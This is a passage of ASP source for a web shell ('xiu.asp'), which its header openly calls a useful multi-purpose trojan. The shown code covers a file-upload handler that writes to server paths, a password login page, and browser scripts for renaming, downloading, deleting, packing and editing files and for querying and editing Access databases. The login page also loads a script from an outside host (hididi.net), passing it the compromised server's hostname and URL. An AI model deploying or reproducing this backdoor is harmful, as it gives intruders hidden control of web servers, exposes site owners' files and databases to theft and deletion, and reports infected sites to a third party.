xiu.asp

一个相当不错的多功能..很有用的木马

		Dim itemDiv, itemDivLen, intStart, intDataLen, intInfoEnd, totalLen, intUpLen, intEnd
		If isDebugMode = False Then On Error Resume Next
		Server.ScriptTimeOut = 5000
		newLine = ChrB(13) & ChrB(10)
		overWrite = Request.QueryString("overWrite")
		overWrite = IIf(overWrite = "true", "2", "1")
		Set sA = Server.CreateObject("Adodb.Stream")
		Set sB = Server.CreateObject("Adodb.Stream")
		
		sA.Type = 1
		sA.Mode = 3
		sA.Open
		sA.Write Request.BinaryRead(Request.TotalBytes)
		sA.Position = 0
		theForm = sA.Read()
'		sA.SaveToFile "c:\001.txt", 2 ''保存到临时文件进行查看
		itemDiv = LeftB(theForm, InStrB(theForm, newLine) - 1)
		totalLen = LenB(theForm)
		itemDivLen = LenB(itemDiv)
		intStart = itemDivLen + 2
		intUpLen = 0 '上面数据的长度
		Do
			intDataLen = InStrB(intStart, theForm, itemDiv) - itemDivLen - 5 ''equals - 2(回车) - 1(InStr) - 2(回车)
			intDataLen = intDataLen - intUpLen
			intEnd = intStart + intDataLen
			intInfoEnd = InStrB(intStart, theForm, newLine & newLine) - 1

			sB.Type = 1
			sB.Mode = 3
			sB.Open
			sA.Position = intStart
			sA.CopyTo sB, intInfoEnd - intStart ''保存元素信息部分
			
			sB.Position = 0
			sB.Type = 2
			sB.CharSet = "GB2312"
			strInfo = sB.ReadText()

			strFileName = ""
			intFindStart = InStr(strInfo, "name=""") + 6
			intFindEnd = InStr(intFindStart, strInfo, """", 1)
			strName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)

			If InStr(strInfo, "filename=""") > 0 Then ''>0则为文件,开始接收文件
				intFindStart = InStr(strInfo, "filename=""") + 10
				intFindEnd = InStr(intFindStart, strInfo, """", 1)
				strFileName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)
				strFileName = Mid(strFileName, InStrRev(strFileName, "\") + 1)
			End If

			sB.Close
			sB.Type = 1
			sB.Mode = 3
			sB.Open
			sA.Position = intInfoEnd + 4
			sA.CopyTo sB, intEnd - intInfoEnd - 4

			If strFileName <> "" Then
				sB.SaveToFile strPath & strFileName, overWrite
				ChkErr(Err)
			 Else
				If strName = "thePath" Then
					sB.Position = 0
					sB.Type = 2
					sB.CharSet = "GB2312"
					strInfo = sB.ReadText()
					thePath = strInfo
					If Mid(thePath, 2, 1) = ":" Then
						ShowErr("对不起,上传只能使用虚拟路径!")
					End If
					strPath = strInfo & "\"
				End If
			End If
			
			sB.Close

			intUpLen = intStart + intDataLen + 2
			intStart = intUpLen + itemDivLen + 2
		Loop Until (intStart + 2) = totalLen

		sA.Close
		Set sA = Nothing
		Set sB = Nothing
	End Sub

	Sub PageLogin()
		Dim passWord
		passWord = Encode(GetPost("password"))

		If theAct = "Login" Then
			If userPassword = passWord Then
				Session(m & "userPassword") = userPassword
				ShowTitle("登录成功!")
				PageReadMe()
				Exit Sub
			End If
		End If
		
		If pageName = "PageOut" Then
			Session.Contents.Remove(m & "userPassword")
			RedirectTo(url)
		End If
		
		If Session(m & "userPassword") = userPassword Then
			PageReadMe()
			Exit Sub
		End If
		
		ShowTitle("管理登录")
		echo "<body onload=document.formx.password.focus();>"
		echo "<table width=416 align=center>"
		echo "<form method=post name=formx action=""" & url & """>"
		echo "<input type=hidden name=theAct value=Login>"
		echo "<tr>"
		echo "<td align=center class=td>管理登录</td>"
		echo "</tr>"
		echo "<tr>"
		echo "<td class=trHead>&nbsp;</td>"
		echo "</tr>"
		echo "<tr>"
		echo "<td height=75 align=center>"
		echo "<input name=password type=password style='border:1px solid #d8d8f0;background-color:#ffffff;'> "
		echo "<input type=submit value=LOGIN style='border:1px solid #d8d8f0;background-color:#f9f9fd;'>"
		echo "</td>"
		echo "</tr>"
		echo "<tr> "
		echo "<td align=center class=td>程序网络工作组ASPAdmin(绝对路径版) V1.00</td>"
		echo "</tr>"
		echo "</form>"
		echo "</table>"
		echo "<script language=javascript src=""http://hididi.net/ASPAdmin/ASPAdmin_T.asp?theUrl=http://" & Request.ServerVariables("SERVER_NAME") & url & "&productName=HigroupASPAdmin_V1_00(A)""></script>"
		echo "</body>"
	End Sub
	
	Sub PageOther()
%>
<style id=theStyle>
BODY {
	FONT-SIZE: 9pt;
	COLOR: #000000;
	background-color: #ffffff;
	FONT-FAMILY: "Courier New";
	scrollbar-face-color:#E4E4F3;
	scrollbar-highlight-color:#FFFFFF;
	scrollbar-3dlight-color:#E4E4F3;
	scrollbar-darkshadow-color:#9C9CD3;
	scrollbar-shadow-color:#E4E4F3;
	scrollbar-arrow-color:#4444B3;
	scrollbar-track-color:#EFEFEF;
}
TABLE {
	FONT-SIZE: 9pt;
	FONT-FAMILY: "Courier New";
	BORDER-COLLAPSE: collapse;
	border-width: 1px;
	border-top-style: solid;
	border-right-style: none;
	border-bottom-style: none;
	border-left-style: solid;
	border-color: #d8d8f0;
}
.tr {
	font-family: "Courier New";
	font-size: 9pt;
	background-color: #e4e4f3;
	text-align: center;
}
.td {
	height: 24px;
	font-size: 9pt;
	background-color: #f9f9fd;
	font-family: "Courier New";
}
input {
	font-family: "Courier New";
	BORDER-TOP-WIDTH: 1px;
	BORDER-LEFT-WIDTH: 1px;
	FONT-SIZE: 12px;
	BORDER-BOTTOM-WIDTH: 1px;
	BORDER-RIGHT-WIDTH: 1px;
	color: #000000;
}
textarea {
	font-family: "Courier New";
	BORDER-WIDTH: 1px;
	FONT-SIZE: 12px;
	color: #000000;
}
A:visited {
	FONT-SIZE: 9pt; 
	COLOR: #333333; 
	FONT-FAMILY: "Courier New"; 
	TEXT-DECORATION: none;
}
A:active {
	FONT-SIZE: 9pt; 
	COLOR: #3366cc; 
	FONT-FAMILY: "Courier New"; 
	TEXT-DECORATION: none;
}
A:link {
	FONT-SIZE: 9pt; 
	COLOR: #000000;
	FONT-FAMILY: "Courier New"; 
	TEXT-DECORATION: none;
}
A:hover {
	FONT-SIZE: 9pt; 
	COLOR: #3366cc; 
	FONT-FAMILY: "Courier New"; 
	TEXT-DECORATION: none;
}
tr {
	font-family: "Courier New";
	font-size: 9pt;
	line-height: 18px;
}
td {
	font-size: 9pt;
	font-family: "Courier New";
	border-width: 1px;
	border-top-style: none;
	border-right-style: solid;
	border-bottom-style: solid;
	border-left-style: none;
	border-color: #d8d8f0;
}
.trHead {
	font-family: "Courier New";
	height: 2px;
	background-color: #e4e4f3;
	line-height: 2px;
}

.fixSpan {
	overflow: hidden;
	white-space: nowrap;
	text-overflow: ellipsis;
	vertical-align: baseline;
}

.fixTable {
	word-break: break-all;
	word-wrap: break-word;
}

#fileList span{
	width: 120px;
	line-height: 23px;
	cursor: hand;
	overflow: hidden;
	padding-left: 5px;
	white-space: nowrap;
	text-overflow: ellipsis;
	vertical-align: baseline;
	border: 1px solid #ffffff;
}
</style>
<script language=javascript>
function showSingleTable(obj){
	var o = obj;
	var win, html;
	while(o && o.parentElement.tagName != 'BODY'){
		o = o.parentElement;
	}
	var win = window.open("about:blank", "", "width=790px,height=10px,resizable=yes,scrollbars=yes");
	html = '<html><body><title>' + obj.id + '</title>';
	html += theStyle.outerHTML;
	html += '<style>body{overflow:hidden;border:none;}</style>' + o.outerHTML + '</body></html>';
	win.document.write(html);
	win.resizeTo(780, win.document.body.scrollHeight + 25);
}

function locate(str){
	var pageName = document.forms[1].PageName.value;
	location.href = '?PageName=' + pageName + '&theAct=' + str;
}

function checkAllBox(obj){
	var frm = document.forms[1];
	for(var i = 0; i < frm.elements.length; i++)
		if(frm.elements[i].id != 'checkAll' && frm.elements[i].type == 'checkbox')
			frm.elements[i].checked = obj.checked;
}

function changeThePath(str){
	var frm = document.forms[1];
	frm.theAct.value = '';
	frm.thePath.value = str;
	frm.submit();
}

function Command(cmd, str){
	var j = 0;
	var strTmpB;
	var strTmp = str;
	var frm = document.forms[1];
	strTmpB = frm.PageName.value;

	if(cmd == 'pack' || cmd == 'del'){
		for(var i = 0; i < frm.elements.length; i++)
			if(frm.elements[i].name != 'checkAll' && frm.elements[i].type == 'checkbox' && frm.elements[i].checked)
				j ++;
		if(j == 0)return;
	}

	if(cmd == 'rename' || cmd == 'saveas'){
		frm.theAct.value = cmd;
		frm.param.value = str + ',';
		str = prompt('请输入新名称', strTmp);
		if(str && (strTmp != str)){
			frm.param.value += str;
		}else return;
	}

	if(cmd == 'download'){
		frm.theAct.value = 'download';
		frm.param.value = str;
		if(!confirm('如果该文件超过20M,\n建议不要通过流方式下载\n这样会占用服务器大量的资源\n并可能导致服务器死机!\n您可以先更改文件的后缀名为sys,\n然后通过http协议直接下载.\n按\"确定\"用流来进行下载.'))
			return;
	}

	if(cmd == 'submit'){
		frm.theAct.value = '';
	}

	if(cmd == 'del'){
		if(confirm('您确认要删除选中的 ' + j + '个 文件(夹)吗?')){
			frm.theAct.value = 'del';
		}else return;
	}

	if(cmd == 'newone')
		if(strTmp = prompt('请输入要新建的文件(夹)名', '')){
			frm.theAct.value = 'newone';
			frm.param.value = strTmp + ',' + str;
		}else return;

	if(cmd == 'move' || cmd == 'copy'){
		frm.theAct.value = cmd;
	}

	if(cmd == 'showedit'){
		frm.theAct.value = cmd;
		frm.param.value = str;
		frm.target = '_blank';
	}

	if(cmd == 'Query'){
		frm.theAct.value = cmd;
		frm.param.value = str;
	}

	if(cmd == 'access'){
		frm.theAct.value = 'ShowTables';
		strTmp = frm.PageName.value;
		frm.PageName.value = 'PageDBTool';
		frm.thePath.value = frm.truePath.value + '\\' + str;
		frm.target = '_blank';
	}

	if(cmd == 'upload'){
		frm.PageName.value = 'PageUpload';
		frm.thePath.value = frm.truePath.value;
		frm.target = '_blank';
	}

	if(cmd == 'pack'){
		if(confirm('您确认要打包选中的 ' + j + '个 项目吗?')){
			frm.PageName.value = 'PagePack';
			frm.theAct.value = 'PackOne';
			frm.target = '_blank';
		}else return;
	}

	frm.submit();
	frm.target = '';
	frm.PageName.value = strTmpB;
}

function showSqlEdit(column, str){
	var frm = document.forms[1];
	if(!str)return;
	frm.theAct.value = 'edit';
	frm.param.value = column + '!' + str;
	frm.target = '_blank';
	frm.submit();
	frm.target = '';
}
function sqlDelete(column, str){
	var frm = document.forms[1];
	if(!str)return;
	if(!confirm('确认要删除这条记录?'))return;
	frm.theAct.value = 'del';
	frm.param.value = column + '!' + str;
	frm.target = '_blank';
	frm.submit();
	frm.target = ''